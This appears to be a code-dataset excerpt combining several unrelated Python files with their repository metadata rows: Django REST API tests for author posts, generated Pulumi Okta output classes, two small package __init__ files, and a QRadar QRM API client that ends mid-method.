response = c.get(f'/service/authors/{author.id}/posts/{post.id}')
self.assertEqual(response.status_code, 200)
self.assertDictEqual(response.json(), post.get_detail_dict())
# post with invalid data
data = {
'title': 'Updated Test Post Title',
'description': 'Updated Test Post description',
'content_type': 'text/plain',
'content': 'Updated test post content',
# missing data
}
response = c.post(f'/service/authors/{author.id}/posts/{post.id}', data)
self.assertEqual(response.status_code, 400)
def test_delete(self):
c = Client()
author = Author.objects.get(username='test0')
visibility = 'PUBLIC'
create_dummy_post(author, visibility=visibility, content_type='text/plain')
post = Post.objects.get(title='Test Post')
response = c.delete(f'/service/authors/{author.id}/posts/{post.id}')
self.assertEqual(response.status_code, 204)
# make sure the post is deleted from database
with self.assertRaises(ObjectDoesNotExist):
Post.objects.get(id=post.id)
response = c.delete(f'/service/authors/{author.id}/posts/{post.id}/')
self.assertEqual(response.status_code, 404, 'Retrieving deleted post should return 404')
def test_put(self):
c = Client()
author = Author.objects.get(username='test0')
post_id = uuid.uuid4()
data = {
'title': 'Test Post',
'description': 'Test Post description',
'content_type': 'text/plain',
'content': 'Test post content',
'categories': 'test,post,categories',
'visibility': 'PUBLIC',
}
response = c.put(f'/service/authors/{author.id}/posts/{post_id}', json.dumps(data))
self.assertEqual(response.status_code, 201)
self.assertTrue(Post.objects.filter(id=post_id, author=author).exists())
# test whether the data is saved in db
response = c.get(f'/service/authors/{author.id}/posts/{post_id}')
self.assertEqual(response.status_code, 200)
post = Post.objects.get(id=post_id, author=author)
self.assertDictEqual(response.json(), post.get_detail_dict())
data = {
'title': 'Updated Test Post',
'description': 'Updated Test Post description',
'content_type': 'text/plain',
'content': 'Updated Test post content',
'categories': 'test,post,categories',
'visibility': 'PUBLIC',
}
# test with non-json data
response = c.put(f'/service/authors/{author.id}/posts/{post_id}', data)
self.assertEqual(response.status_code, 400)
# test update without being authenticated
response = c.put(f'/service/authors/{author.id}/posts/{post_id}', json.dumps(data))
self.assertEqual(response.status_code, 403)
# test with valid json data and authenticated user
c.login(username=author.username, password='temporary')
response = c.put(f'/service/authors/{author.id}/posts/{post_id}', json.dumps(data))
self.assertEqual(response.status_code, 200)
# test with invalid data
data.pop('title')
response = c.put(f'/service/authors/{author.id}/posts/{post_id}', data)
self.assertEqual(response.status_code, 400)
# test whether the data is saved in db
response = c.get(f'/service/authors/{author.id}/posts/{post_id}')
self.assertEqual(response.status_code, 200)
post = Post.objects.get(id=post_id, author=author)
self.assertDictEqual(response.json(), post.get_detail_dict())
class PostsViewTestCase(TestCase):
def setUp(self):
ServerNode.objects.create(host='testserver', is_local=True)
create_dummy_authors(1)
def test_get(self):
c = Client()
author = Author.objects.get(username='test0')
num_public_posts = 10
num_friends_posts = 5
create_dummy_posts(num_public_posts, author, visibility='PUBLIC')
create_dummy_posts(num_friends_posts, author, visibility='FRIENDS')
response = c.get(f'/service/authors/{author.id}/posts?page=1&size={num_public_posts}')
self.assertEqual(response.status_code, 200)
data = response.json()
self.assertEqual(data['type'], 'posts')
self.assertEqual(len(data['items']), num_public_posts)
# test the first three posts
posts_data = data['items'][:3]
for post_data in posts_data:
post_id = post_data['id'].split('/')[-1]
post = Post.objects.get(id=post_id, author=author)
self.assertDictEqual(post_data, post.get_detail_dict())
# test invalid page
response = c.get(f'/service/authors/{author.id}/posts?page=2&size={num_public_posts}')
self.assertEqual(response.status_code, 404)
def test_head(self):
c = Client()
author = Author.objects.get(username='test0')
num_public_posts = 10
num_friends_posts = 5
create_dummy_posts(num_public_posts, author, visibility='PUBLIC')
create_dummy_posts(num_friends_posts, author, visibility='FRIENDS')
response = c.head(f'/service/authors/{author.id}/posts?page=1&size={num_public_posts}')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, b'')
def test_post(self):
c = Client()
author = Author.objects.get(username='test0')
data = {
'title': 'Test Post',
'description': 'Test Post description',
'content_type': 'text/plain',
'content': 'Test post content',
'categories': 'test,post,categories',
'visibility': 'PUBLIC',
}
# test with valid data
response = c.post(f'/service/authors/{author.id}/posts', data)
self.assertEqual(response.status_code, 201)
# test fields of newly created post
post = Post.objects.get(title='Test Post', author=author)
response = c.get(f'/service/authors/{author.id}/posts/{post.id}')
self.assertEqual(response.status_code, 200)
self.assertDictEqual(response.json(), post.get_detail_dict())
# test with invalid data
data['title'] = 'a' * 200
response = c.post(f'/service/authors/{author.id}/posts', data)
self.assertEqual(response.status_code, 400)
| 37.793774
| 96
| 0.632863
| 1,166
| 9,713
| 5.158662
| 0.109777
| 0.028928
| 0.095594
| 0.080299
| 0.817623
| 0.786201
| 0.781047
| 0.749293
| 0.742311
| 0.723358
| 0
| 0.013096
| 0.237414
| 9,713
| 256
| 97
| 37.941406
| 0.798974
| 0.063626
| 0
| 0.704545
| 0
| 0
| 0.23301
| 0.120366
| 0
| 0
| 0
| 0
| 0.210227
| 1
| 0.056818
| false
| 0.011364
| 0.039773
| 0
| 0.107955
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
350fc40bc329a020f52e59bb40b58f32599ef32a
| 20,004
|
py
|
Python
|
sdk/python/pulumi_okta/app/outputs.py
|
pulumi/pulumi-okta
|
83f7617a85b3d05213901773fa4e6a151ab6076b
|
[
"ECL-2.0",
"Apache-2.0"
] | 5
|
2019-10-29T21:59:22.000Z
|
2021-11-08T12:00:24.000Z
|
sdk/python/pulumi_okta/app/outputs.py
|
pulumi/pulumi-okta
|
83f7617a85b3d05213901773fa4e6a151ab6076b
|
[
"ECL-2.0",
"Apache-2.0"
] | 109
|
2020-01-06T10:28:09.000Z
|
2022-03-25T19:52:40.000Z
|
sdk/python/pulumi_okta/app/outputs.py
|
pulumi/pulumi-okta
|
83f7617a85b3d05213901773fa4e6a151ab6076b
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2020-09-11T16:31:04.000Z
|
2020-11-24T12:23:17.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'AutoLoginUser',
'BasicAuthUser',
'BookmarkUser',
'OAuthGroupsClaim',
'OAuthJwk',
'OAuthUser',
'SamlAttributeStatement',
'SamlUser',
'SecurePasswordStoreUser',
'SwaUser',
'ThreeFieldUser',
'UserSchemaArrayOneOf',
'UserSchemaOneOf',
'GetSamlAttributeStatementResult',
]
@pulumi.output_type
class AutoLoginUser(dict):
def __init__(__self__, *,
id: Optional[str] = None,
password: Optional[str] = None,
scope: Optional[str] = None,
username: Optional[str] = None):
if id is not None:
pulumi.set(__self__, "id", id)
if password is not None:
pulumi.set(__self__, "password", password)
if scope is not None:
pulumi.set(__self__, "scope", scope)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def id(self) -> Optional[str]:
return pulumi.get(self, "id")
@property
@pulumi.getter
def password(self) -> Optional[str]:
return pulumi.get(self, "password")
@property
@pulumi.getter
def scope(self) -> Optional[str]:
return pulumi.get(self, "scope")
@property
@pulumi.getter
def username(self) -> Optional[str]:
return pulumi.get(self, "username")
@pulumi.output_type
class BasicAuthUser(dict):
def __init__(__self__, *,
id: Optional[str] = None,
password: Optional[str] = None,
scope: Optional[str] = None,
username: Optional[str] = None):
"""
:param str id: ID of the Application.
"""
if id is not None:
pulumi.set(__self__, "id", id)
if password is not None:
pulumi.set(__self__, "password", password)
if scope is not None:
pulumi.set(__self__, "scope", scope)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def id(self) -> Optional[str]:
"""
ID of the Application.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def password(self) -> Optional[str]:
return pulumi.get(self, "password")
@property
@pulumi.getter
def scope(self) -> Optional[str]:
return pulumi.get(self, "scope")
@property
@pulumi.getter
def username(self) -> Optional[str]:
return pulumi.get(self, "username")
@pulumi.output_type
class BookmarkUser(dict):
def __init__(__self__, *,
id: Optional[str] = None,
password: Optional[str] = None,
scope: Optional[str] = None,
username: Optional[str] = None):
"""
:param str id: ID of the Application.
"""
if id is not None:
pulumi.set(__self__, "id", id)
if password is not None:
pulumi.set(__self__, "password", password)
if scope is not None:
pulumi.set(__self__, "scope", scope)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def id(self) -> Optional[str]:
"""
ID of the Application.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def password(self) -> Optional[str]:
return pulumi.get(self, "password")
@property
@pulumi.getter
def scope(self) -> Optional[str]:
return pulumi.get(self, "scope")
@property
@pulumi.getter
def username(self) -> Optional[str]:
return pulumi.get(self, "username")
@pulumi.output_type
class OAuthGroupsClaim(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "filterType":
suggest = "filter_type"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in OAuthGroupsClaim. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
OAuthGroupsClaim.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
OAuthGroupsClaim.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
name: str,
type: str,
value: str,
filter_type: Optional[str] = None):
"""
:param str name: Name of the claim that will be used in the token.
:param str type: Groups claim type. Valid values: `"FILTER"`, `"EXPRESSION"`.
:param str value: Value of the claim. Can be an Okta Expression Language statement that evaluates at the time the token is minted.
:param str filter_type: Groups claim filter. Can only be set if type is `"FILTER"`. Valid values: `"EQUALS"`, `"STARTS_WITH"`, `"CONTAINS"`, `"REGEX"`.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "type", type)
pulumi.set(__self__, "value", value)
if filter_type is not None:
pulumi.set(__self__, "filter_type", filter_type)
@property
@pulumi.getter
def name(self) -> str:
"""
Name of the claim that will be used in the token.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def type(self) -> str:
"""
Groups claim type. Valid values: `"FILTER"`, `"EXPRESSION"`.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter
def value(self) -> str:
"""
Value of the claim. Can be an Okta Expression Language statement that evaluates at the time the token is minted.
"""
return pulumi.get(self, "value")
@property
@pulumi.getter(name="filterType")
def filter_type(self) -> Optional[str]:
"""
Groups claim filter. Can only be set if type is `"FILTER"`. Valid values: `"EQUALS"`, `"STARTS_WITH"`, `"CONTAINS"`, `"REGEX"`.
"""
return pulumi.get(self, "filter_type")
@pulumi.output_type
class OAuthJwk(dict):
def __init__(__self__, *,
kid: str,
kty: str,
e: Optional[str] = None,
n: Optional[str] = None):
pulumi.set(__self__, "kid", kid)
pulumi.set(__self__, "kty", kty)
if e is not None:
pulumi.set(__self__, "e", e)
if n is not None:
pulumi.set(__self__, "n", n)
@property
@pulumi.getter
def kid(self) -> str:
return pulumi.get(self, "kid")
@property
@pulumi.getter
def kty(self) -> str:
return pulumi.get(self, "kty")
@property
@pulumi.getter
def e(self) -> Optional[str]:
return pulumi.get(self, "e")
@property
@pulumi.getter
def n(self) -> Optional[str]:
return pulumi.get(self, "n")
@pulumi.output_type
class OAuthUser(dict):
def __init__(__self__, *,
id: Optional[str] = None,
password: Optional[str] = None,
scope: Optional[str] = None,
username: Optional[str] = None):
"""
:param str id: ID of the application.
"""
if id is not None:
pulumi.set(__self__, "id", id)
if password is not None:
pulumi.set(__self__, "password", password)
if scope is not None:
pulumi.set(__self__, "scope", scope)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def id(self) -> Optional[str]:
"""
ID of the application.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def password(self) -> Optional[str]:
return pulumi.get(self, "password")
@property
@pulumi.getter
def scope(self) -> Optional[str]:
return pulumi.get(self, "scope")
@property
@pulumi.getter
def username(self) -> Optional[str]:
return pulumi.get(self, "username")
@pulumi.output_type
class SamlAttributeStatement(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "filterType":
suggest = "filter_type"
elif key == "filterValue":
suggest = "filter_value"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in SamlAttributeStatement. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
SamlAttributeStatement.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
SamlAttributeStatement.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
name: str,
filter_type: Optional[str] = None,
filter_value: Optional[str] = None,
namespace: Optional[str] = None,
type: Optional[str] = None,
values: Optional[Sequence[str]] = None):
"""
:param str name: The name of the attribute statement.
:param str filter_type: Type of group attribute filter. Valid values are: `"STARTS_WITH"`, `"EQUALS"`, `"CONTAINS"`, or `"REGEX"`
:param str filter_value: Filter value to use.
:param str namespace: The attribute namespace. It can be set to `"urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified"`, `"urn:oasis:names:tc:SAML:2.0:attrname-format:uri"`, or `"urn:oasis:names:tc:SAML:2.0:attrname-format:basic"`.
:param str type: The type of attribute statement value. Valid values are: `"EXPRESSION"` or `"GROUP"`. Default is `"EXPRESSION"`.
:param Sequence[str] values: Array of values to use.
"""
pulumi.set(__self__, "name", name)
if filter_type is not None:
pulumi.set(__self__, "filter_type", filter_type)
if filter_value is not None:
pulumi.set(__self__, "filter_value", filter_value)
if namespace is not None:
pulumi.set(__self__, "namespace", namespace)
if type is not None:
pulumi.set(__self__, "type", type)
if values is not None:
pulumi.set(__self__, "values", values)
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the attribute statement.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="filterType")
def filter_type(self) -> Optional[str]:
"""
Type of group attribute filter. Valid values are: `"STARTS_WITH"`, `"EQUALS"`, `"CONTAINS"`, or `"REGEX"`
"""
return pulumi.get(self, "filter_type")
@property
@pulumi.getter(name="filterValue")
def filter_value(self) -> Optional[str]:
"""
Filter value to use.
"""
return pulumi.get(self, "filter_value")
@property
@pulumi.getter
def namespace(self) -> Optional[str]:
"""
The attribute namespace. It can be set to `"urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified"`, `"urn:oasis:names:tc:SAML:2.0:attrname-format:uri"`, or `"urn:oasis:names:tc:SAML:2.0:attrname-format:basic"`.
"""
return pulumi.get(self, "namespace")
@property
@pulumi.getter
def type(self) -> Optional[str]:
"""
The type of attribute statement value. Valid values are: `"EXPRESSION"` or `"GROUP"`. Default is `"EXPRESSION"`.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter
def values(self) -> Optional[Sequence[str]]:
"""
Array of values to use.
"""
return pulumi.get(self, "values")
@pulumi.output_type
class SamlUser(dict):
def __init__(__self__, *,
id: Optional[str] = None,
password: Optional[str] = None,
scope: Optional[str] = None,
username: Optional[str] = None):
"""
:param str id: id of application.
"""
if id is not None:
pulumi.set(__self__, "id", id)
if password is not None:
pulumi.set(__self__, "password", password)
if scope is not None:
pulumi.set(__self__, "scope", scope)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def id(self) -> Optional[str]:
"""
id of application.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def password(self) -> Optional[str]:
return pulumi.get(self, "password")
@property
@pulumi.getter
def scope(self) -> Optional[str]:
return pulumi.get(self, "scope")
@property
@pulumi.getter
def username(self) -> Optional[str]:
return pulumi.get(self, "username")
@pulumi.output_type
class SecurePasswordStoreUser(dict):
def __init__(__self__, *,
id: Optional[str] = None,
password: Optional[str] = None,
scope: Optional[str] = None,
username: Optional[str] = None):
if id is not None:
pulumi.set(__self__, "id", id)
if password is not None:
pulumi.set(__self__, "password", password)
if scope is not None:
pulumi.set(__self__, "scope", scope)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def id(self) -> Optional[str]:
return pulumi.get(self, "id")
@property
@pulumi.getter
def password(self) -> Optional[str]:
return pulumi.get(self, "password")
@property
@pulumi.getter
def scope(self) -> Optional[str]:
return pulumi.get(self, "scope")
@property
@pulumi.getter
def username(self) -> Optional[str]:
return pulumi.get(self, "username")
@pulumi.output_type
class SwaUser(dict):
def __init__(__self__, *,
id: Optional[str] = None,
password: Optional[str] = None,
scope: Optional[str] = None,
username: Optional[str] = None):
if id is not None:
pulumi.set(__self__, "id", id)
if password is not None:
pulumi.set(__self__, "password", password)
if scope is not None:
pulumi.set(__self__, "scope", scope)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def id(self) -> Optional[str]:
return pulumi.get(self, "id")
@property
@pulumi.getter
def password(self) -> Optional[str]:
return pulumi.get(self, "password")
@property
@pulumi.getter
def scope(self) -> Optional[str]:
return pulumi.get(self, "scope")
@property
@pulumi.getter
def username(self) -> Optional[str]:
return pulumi.get(self, "username")
@pulumi.output_type
class ThreeFieldUser(dict):
def __init__(__self__, *,
id: Optional[str] = None,
password: Optional[str] = None,
scope: Optional[str] = None,
username: Optional[str] = None):
if id is not None:
pulumi.set(__self__, "id", id)
if password is not None:
pulumi.set(__self__, "password", password)
if scope is not None:
pulumi.set(__self__, "scope", scope)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def id(self) -> Optional[str]:
return pulumi.get(self, "id")
@property
@pulumi.getter
def password(self) -> Optional[str]:
return pulumi.get(self, "password")
@property
@pulumi.getter
def scope(self) -> Optional[str]:
return pulumi.get(self, "scope")
@property
@pulumi.getter
def username(self) -> Optional[str]:
return pulumi.get(self, "username")
@pulumi.output_type
class UserSchemaArrayOneOf(dict):
def __init__(__self__, *,
const: str,
title: str):
"""
:param str const: value mapping to member of `enum`.
:param str title: display name for the enum value.
"""
pulumi.set(__self__, "const", const)
pulumi.set(__self__, "title", title)
@property
@pulumi.getter
def const(self) -> str:
"""
value mapping to member of `enum`.
"""
return pulumi.get(self, "const")
@property
@pulumi.getter
def title(self) -> str:
"""
display name for the enum value.
"""
return pulumi.get(self, "title")
@pulumi.output_type
class UserSchemaOneOf(dict):
def __init__(__self__, *,
const: str,
title: str):
"""
:param str const: value mapping to member of `enum`.
:param str title: display name for the enum value.
"""
pulumi.set(__self__, "const", const)
pulumi.set(__self__, "title", title)
@property
@pulumi.getter
def const(self) -> str:
"""
value mapping to member of `enum`.
"""
return pulumi.get(self, "const")
@property
@pulumi.getter
def title(self) -> str:
"""
display name for the enum value.
"""
return pulumi.get(self, "title")
@pulumi.output_type
class GetSamlAttributeStatementResult(dict):
def __init__(__self__, *,
filter_type: str,
filter_value: str,
name: str,
namespace: str,
type: str,
values: Sequence[str]):
"""
:param str filter_type: Type of group attribute filter.
:param str filter_value: Filter value to use.
:param str name: The name of the attribute statement.
:param str namespace: The attribute namespace.
:param str type: The type of attribute statement value.
:param Sequence[str] values: Array of values to use.
"""
pulumi.set(__self__, "filter_type", filter_type)
pulumi.set(__self__, "filter_value", filter_value)
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "namespace", namespace)
pulumi.set(__self__, "type", type)
pulumi.set(__self__, "values", values)
@property
@pulumi.getter(name="filterType")
def filter_type(self) -> str:
"""
Type of group attribute filter.
"""
return pulumi.get(self, "filter_type")
@property
@pulumi.getter(name="filterValue")
def filter_value(self) -> str:
"""
Filter value to use.
"""
return pulumi.get(self, "filter_value")
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the attribute statement.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def namespace(self) -> str:
"""
The attribute namespace.
"""
return pulumi.get(self, "namespace")
@property
@pulumi.getter
def type(self) -> str:
"""
The type of attribute statement value.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter
def values(self) -> Sequence[str]:
"""
Array of values to use.
"""
return pulumi.get(self, "values")
| 29.417647
| 243
| 0.569786
| 2,247
| 20,004
| 4.88162
| 0.067646
| 0.07822
| 0.066369
| 0.097001
| 0.871091
| 0.864618
| 0.839639
| 0.798158
| 0.783572
| 0.764427
| 0
| 0.000939
| 0.307788
| 20,004
| 679
| 244
| 29.460972
| 0.791218
| 0.159568
| 0
| 0.82227
| 1
| 0.004283
| 0.075213
| 0.006215
| 0
| 0
| 0
| 0
| 0
| 1
| 0.162741
| false
| 0.089936
| 0.010707
| 0.068522
| 0.331906
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
10673615ce6594f8d14a0cb5b3835ab1fc69cf84
| 253
|
py
|
Python
|
h1st_contrib/pred_maint/data_mgmt/__init__.py
|
h1st-ai/h1st-contrib
|
38fbb1fff4513bb3433bc12f2b436836e5e51c80
|
[
"Apache-2.0"
] | 1
|
2022-02-19T18:55:43.000Z
|
2022-02-19T18:55:43.000Z
|
h1st_contrib/pred_maint/data_mgmt/__init__.py
|
h1st-ai/h1st-contrib
|
38fbb1fff4513bb3433bc12f2b436836e5e51c80
|
[
"Apache-2.0"
] | null | null | null |
h1st_contrib/pred_maint/data_mgmt/__init__.py
|
h1st-ai/h1st-contrib
|
38fbb1fff4513bb3433bc12f2b436836e5e51c80
|
[
"Apache-2.0"
] | null | null | null |
"""Data Sets."""
from .equipment_parquet_data import (
EquipmentParquetDataSet,
EQUIPMENT_INSTANCE_ID_COL, DATE_COL, DATE_TIME_COL,
)
__all__ = (
'EquipmentParquetDataSet',
'EQUIPMENT_INSTANCE_ID_COL', 'DATE_COL', 'DATE_TIME_COL',
)
| 18.071429
| 61
| 0.731225
| 28
| 253
| 5.964286
| 0.464286
| 0.167665
| 0.479042
| 0.502994
| 0.754491
| 0.754491
| 0.754491
| 0.754491
| 0.754491
| 0.754491
| 0
| 0
| 0.15415
| 253
| 13
| 62
| 19.461538
| 0.780374
| 0.039526
| 0
| 0
| 0
| 0
| 0.291139
| 0.202532
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.125
| 0
| 0.125
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1067800ceab5a35e19bc23e16dd1ee1efb138b70
| 178
|
py
|
Python
|
client/starwhale/__init__.py
|
star-whale/starwhale
|
11cfe86d3a0c2972b508812d101f1b32e4166706
|
[
"Apache-2.0"
] | 13
|
2022-03-09T15:27:29.000Z
|
2022-03-29T06:12:47.000Z
|
client/starwhale/__init__.py
|
star-whale/starwhale
|
11cfe86d3a0c2972b508812d101f1b32e4166706
|
[
"Apache-2.0"
] | 7
|
2022-03-14T08:59:39.000Z
|
2022-03-30T00:50:40.000Z
|
client/starwhale/__init__.py
|
star-whale/starwhale
|
11cfe86d3a0c2972b508812d101f1b32e4166706
|
[
"Apache-2.0"
] | 9
|
2022-03-10T08:12:44.000Z
|
2022-03-26T15:00:13.000Z
|
import os
import importlib_metadata
__version__: str = importlib_metadata.version("starwhale") # type: ignore
os.environ["SW_VERSION"] = __version__
# TODO: only export api
| 17.8
| 74
| 0.769663
| 22
| 178
| 5.727273
| 0.681818
| 0.269841
| 0.380952
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.134831
| 178
| 9
| 75
| 19.777778
| 0.818182
| 0.191011
| 0
| 0
| 0
| 0
| 0.134752
| 0
| 0
| 0
| 0
| 0.111111
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
107a270170c8f4b207de679ad4a99a08f773f094
| 8,648
|
py
|
Python
|
qradar4py/endpoints/qrm.py
|
ryukisec/qradar4py
|
958cdea92709778916f0ff8d84d75b18aaad4a66
|
[
"MIT"
] | 10
|
2019-11-19T21:13:32.000Z
|
2021-11-17T19:35:53.000Z
|
qradar4py/endpoints/qrm.py
|
ryukisec/qradar4py
|
958cdea92709778916f0ff8d84d75b18aaad4a66
|
[
"MIT"
] | 2
|
2021-05-21T16:15:16.000Z
|
2021-07-20T12:34:49.000Z
|
qradar4py/endpoints/qrm.py
|
ryukisec/qradar4py
|
958cdea92709778916f0ff8d84d75b18aaad4a66
|
[
"MIT"
] | 6
|
2020-09-14T13:44:55.000Z
|
2021-11-17T19:35:55.000Z
|
from urllib.parse import urljoin
from qradar4py.endpoints.api_endpoint import QRadarAPIEndpoint
from qradar4py.endpoints.api_endpoint import request_vars
from qradar4py.endpoints.api_endpoint import header_vars
class Qrm(QRadarAPIEndpoint):
"""
The QRadar API endpoint group /qrm and its endpoints.
"""
__baseurl = 'qrm/'
def __init__(self, url, header, verify):
super().__init__(urljoin(url, self.__baseurl),
header,
verify)
@header_vars('Range')
@request_vars('filter', 'fields')
def get_model_groups(self, *, Range=None, filter=None, fields=None, **kwargs):
"""
GET /qrm/model_groups
Retrieves a list of model groups.
"""
function_endpoint = urljoin(self._baseurl, 'model_groups')
return self._call('GET', function_endpoint, **kwargs)
def delete_model_groups_by_group_id(self, group_id, **kwargs):
"""
DELETE /qrm/model_groups/{group_id}
Deletes a model group.
"""
function_endpoint = urljoin(self._baseurl, 'model_groups/{group_id}'.format(group_id=group_id))
return self._call('DELETE', function_endpoint, response_type='text/plain', **kwargs)
@header_vars('fields')
def post_model_groups_by_group_id(self, group_id, *, group, fields=None, **kwargs):
"""
POST /qrm/model_groups/{group_id}
Updates the owner of a model group.
"""
function_endpoint = urljoin(self._baseurl, 'model_groups/{group_id}'.format(group_id=group_id))
return self._call('POST', function_endpoint, json=group, **kwargs)
@request_vars('fields')
def get_model_groups_by_group_id(self, group_id, *, fields=None, **kwargs):
"""
GET /qrm/model_groups/{group_id}
Retrieves a model group.
"""
function_endpoint = urljoin(self._baseurl, 'model_groups/{group_id}'.format(group_id=group_id))
return self._call('GET', function_endpoint, **kwargs)
@header_vars('Range')
@request_vars('filter', 'fields')
def get_qrm_saved_search_groups(self, *, Range=None, filter=None, fields=None, **kwargs):
"""
GET /qrm/qrm_saved_search_groups
Retrieves a list of QRM saved search groups.
"""
function_endpoint = urljoin(self._baseurl, 'qrm_saved_search_groups')
return self._call('GET', function_endpoint, **kwargs)
def delete_qrm_saved_search_groups_by_group_id(self, group_id, **kwargs):
"""
DELETE /qrm/qrm_saved_search_groups/{group_id}
Deletes a QRM saved search group.
"""
function_endpoint = urljoin(self._baseurl, 'qrm_saved_search_groups/{group_id}'.format(group_id=group_id))
return self._call('DELETE', function_endpoint, response_type='text/plain', **kwargs)
@request_vars('fields')
def get_qrm_saved_search_groups_by_group_id(self, group_id, *, fields=None, **kwargs):
"""
GET /qrm/qrm_saved_search_groups/{group_id}
Retrieves a QRM saved search group.
"""
function_endpoint = urljoin(self._baseurl, 'qrm_saved_search_groups/{group_id}'.format(group_id=group_id))
return self._call('GET', function_endpoint, **kwargs)
@header_vars('fields')
def post_qrm_saved_search_groups_by_group_id(self, group_id, *, group, fields=None, **kwargs):
"""
POST /qrm/qrm_saved_search_groups/{group_id}
Updates the owner of a QRM saved search group.
"""
function_endpoint = urljoin(self._baseurl, 'qrm_saved_search_groups/{group_id}'.format(group_id=group_id))
return self._call('POST', function_endpoint, json=group, **kwargs)
@header_vars('Range')
@request_vars('filter', 'fields')
def get_question_groups(self, *, Range=None, filter=None, fields=None, **kwargs):
"""
GET /qrm/question_groups
Retrieves a list of question groups.
"""
function_endpoint = urljoin(self._baseurl, 'question_groups')
return self._call('GET', function_endpoint, **kwargs)
@header_vars('fields')
def post_question_groups_by_group_id(self, group_id, *, group, fields=None, **kwargs):
"""
POST /qrm/question_groups/{group_id}
Updates the owner of a question group.
"""
function_endpoint = urljoin(self._baseurl, 'question_groups/{group_id}'.format(group_id=group_id))
return self._call('POST', function_endpoint, json=group, **kwargs)
def delete_question_groups_by_group_id(self, group_id, **kwargs):
"""
DELETE /qrm/question_groups/{group_id}
Deletes a question group.
"""
function_endpoint = urljoin(self._baseurl, 'question_groups/{group_id}'.format(group_id=group_id))
return self._call('DELETE', function_endpoint, response_type='text/plain', **kwargs)
@request_vars('fields')
def get_question_groups_by_group_id(self, group_id, *, fields=None, **kwargs):
"""
GET /qrm/question_groups/{group_id}
Retrieves a question group.
"""
function_endpoint = urljoin(self._baseurl, 'question_groups/{group_id}'.format(group_id=group_id))
return self._call('GET', function_endpoint, **kwargs)
@header_vars('Range')
@request_vars('filter', 'fields')
def get_simulation_groups(self, *, Range=None, filter=None, fields=None, **kwargs):
"""
GET /qrm/simulation_groups
Retrieves a of list the simulation groups.
"""
function_endpoint = urljoin(self._baseurl, 'simulation_groups')
return self._call('GET', function_endpoint, **kwargs)
@header_vars('fields')
def post_simulation_groups_by_group_id(self, group_id, *, group, fields=None, **kwargs):
"""
POST /qrm/simulation_groups/{group_id}
Updates the owner of a simulation group.
"""
function_endpoint = urljoin(self._baseurl, 'simulation_groups/{group_id}'.format(group_id=group_id))
return self._call('POST', function_endpoint, json=group, **kwargs)
def delete_simulation_groups_by_group_id(self, group_id, **kwargs):
"""
DELETE /qrm/simulation_groups/{group_id}
Deletes a simulation group.
"""
